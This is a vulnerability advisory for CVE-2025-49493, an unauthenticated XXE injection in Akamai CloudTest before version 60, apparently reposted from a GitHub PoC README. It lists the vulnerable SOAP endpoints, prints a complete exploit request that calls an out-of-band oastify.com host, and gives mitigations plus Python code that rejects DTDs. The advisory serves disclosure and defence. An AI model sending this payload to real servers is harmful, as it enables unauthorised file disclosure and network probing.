Akamai CloudTest XXE Injection Vulnerability

Vulnerability Information

Vulnerability name: Akamai CloudTest XXE Injection Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-49493

Vulnerability type: XML External Entity Injection

Severity: Medium

Vulnerability description: Akamai CloudTest is a widely used cloud testing platform, mainly used for performance testing and security assessment of enterprise-grade services. The platform tests the stability and security of web applications and services by simulating large volumes of user requests, which makes it popular with enterprises and service providers. The XXE injection vulnerability disclosed here affects all Akamai CloudTest instances before version 60 (build 12988).

The vulnerability is an XML External Entity (XXE) injection. Its technical root cause is that Akamai CloudTest does not properly restrict the XML parser's handling of external entities when processing SOAP requests. An attacker can send a crafted XML request to a SOAP endpoint (such as /concerto/services/RepositoryService) that injects an external DTD and thereby reads local files on the server. The attack requires no authentication or user interaction, which greatly increases the risk.

In terms of impact, the vulnerability can lead to serious security risks, including but not limited to disclosure of sensitive information (such as reading the /etc/passwd file) and exposure of server configuration. Because it can be exploited remotely without authentication, its potential reach is wide, especially in environments that have not been patched promptly. An attacker could also use it as a foothold for further penetration of the network, for example by using leaked information to mount more targeted attacks. All enterprises and service providers running Akamai CloudTest are therefore advised to upgrade to version 60 or later immediately to guard against these threats.

Vendor: Akamai

Product: Akamai CloudTest

Affected versions: version < 60 (build 12988)

Source: https://github.com/B1ack4sh/Blackash-CVE-2025-49493

Type: CVE-2025:github search

Repository files

  • README.md

Source overview

CVE-2025-49493 Akamai CloudTest - XXE Injection

📄 Description:

Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.


🛠️ Basic Information:

  • Affected Product: Akamai CloudTest (prior to version 60 — build 12988, released June 2025)
  • Vulnerability Type: XML External Entity Injection (XXE)
  • CWE: CWE-611 – Improper Restriction of XML External Entity
  • Impact: Remote attackers can send crafted XML to read local files on the server without authentication or user interaction.

🔍 Technical Details:

  • Vulnerable SOAP endpoints include:

```
/concerto/services/RepositoryService
/concerto/services/CollectorService
/concerto/services/Concerto
/concerto/services/SampleService
```

  • Example request from the repository:

```http
POST //concerto/services/RepositoryService HTTP/1.1
Host: readacted.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Brave";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (******; **** *** ** X 10_15_7) **********/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 *****/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 610

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "http://b6it5hei11vmt9as2lbg98h4gvmrahy6.oastify.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:rep="http://example.com/services/repository">
<soapenv:Header/>
<soapenv:Body>
<rep:getUIBundleObjectXml>
<rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
</rep:getUIBundleObjectXml>
</soapenv:Body>
</soapenv:Envelope>
```
  • The flaw allows attackers to inject external DTDs (Document Type Definitions) and exploit XML parsers to leak local file content.
  • Techniques such as error-based parsing and out-of-band (OOB) data exfiltration can be used.

📊 Severity:

  • CVSS v3.1 Score: 5.8 (Medium 🟠)
  • Attack Vector: Network
  • Privileges Required: None
  • User Interaction: None
  • Impact: Confidentiality breach (e.g., reading /etc/passwd)

✅ Mitigation Steps:

  1. Update to CloudTest version 60 or later, where external entity parsing is disabled by default.
  2. Disable DTD processing in XML parsers manually if an upgrade isn’t possible.
  3. Restrict network access to CloudTest instances (e.g., via firewalls and IP allowlists).
  4. Monitor XML traffic for anomalies or known exploit patterns.
  5. Limit file access permissions for the CloudTest service to reduce impact.
  6. Deploy a WAF (Web Application Firewall) with rules against XXE attacks.
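
As an added illustration of step 2 (not code from the advisory, the repository or the CloudTest product), the following Python shows a parse-time gate that refuses any DOCTYPE, entity declaration or external reference before a SOAP body is processed, using expat's declaration callbacks. The two request bodies are constructed; the second mirrors the envelope shape shown above with a placeholder out-of-band host.

```python
import xml.parsers.expat as expat

class DtdRejected(ValueError):
    """Request carried a DOCTYPE, an entity declaration or an external reference."""

def parse_soap_safely(xml_bytes: bytes) -> dict:
    """Parse a SOAP envelope with expat, refusing any DTD before it is processed.
    Returns {"root": root element, "text": {local element name: text}} so the
    caller can see exactly what reached the application layer."""
    parser, stack, out = expat.ParserCreate(), [], {"root": None, "text": {}}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # SOAP clients never need a DOCTYPE, and it is where SYSTEM entities are declared.
        raise DtdRejected(f"DOCTYPE '{name}' is not allowed in a SOAP request")
    def on_entity(name, is_pe, value, base, sysid, pubid, notation):
        raise DtdRejected(f"entity declaration '{name}' is not allowed")
    def on_ext_ref(context, base, sysid, pubid):
        # Defence in depth: never resolve an external reference that got this far.
        raise DtdRejected(f"external entity reference to {sysid!r} refused")
    def on_start(name, attrs):
        out["root"] = out["root"] or name
        stack.append(name)
    def on_chars(data):
        local = stack[-1].split(":")[-1]  # drop the namespace prefix
        out["text"][local] = out["text"].get(local, "") + data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_ext_ref
    parser.StartElementHandler = on_start
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = on_chars
    parser.Parse(xml_bytes, True)
    return out

def gate_request(xml_bytes: bytes) -> str:
    """Decision a SOAP front end would log: 'accepted' or 'rejected: <reason>'."""
    try:
        parse_soap_safely(xml_bytes)
        return "accepted"
    except (DtdRejected, expat.ExpatError) as exc:
        return f"rejected: {exc}"

# Constructed bodies: a benign call, and the advisory's envelope shape with a placeholder OOB host.
ENVELOPE = (b'<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
            b'<soapenv:Body><rep:uiBundleRequestXml xmlns:rep="http://example.com/services/repository">'
            b'%s</rep:uiBundleRequestXml></soapenv:Body></soapenv:Envelope>')
BENIGN = b'<?xml version="1.0"?>' + ENVELOPE % b'bundle-1'
XXE = (b'<?xml version="1.0"?><!DOCTYPE soapenv:Envelope [<!ENTITY xxe SYSTEM '
       b'"http://oob.example.invalid/">]>' + ENVELOPE % b'&xxe;')
```

The gate rejects the envelope at the DOCTYPE, before any entity is declared or expanded, so no file read or outbound request can be triggered.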

📅 Timeline:

  • Vulnerability discovered: June 2025
  • Fix released: Early July 2025
  • Proof of Concept (PoC) exists publicly.
  • No confirmed mass exploitation as of now.

✅ Summary Table:

| Field | Details |
| --- | --- |
| Product | Akamai CloudTest < v60 |
| CVSS Score | 5.8 (Medium) |
| Exploitable | Remotely, no auth required |
| Affected Feature | XML SOAP services |
| Attack Technique | XXE via external DTDs |
| Patch | Available in version 60 (June 2025) |
| Risk | Disclosure of sensitive files |

⚠️ Disclaimer:

This PoC is provided for educational and research purposes only. Running this on any system without permission is illegal and unethical!!!

http://example.com/2025/07/05/github_1717591136/
Author: lianccc
Published: 5 July 2025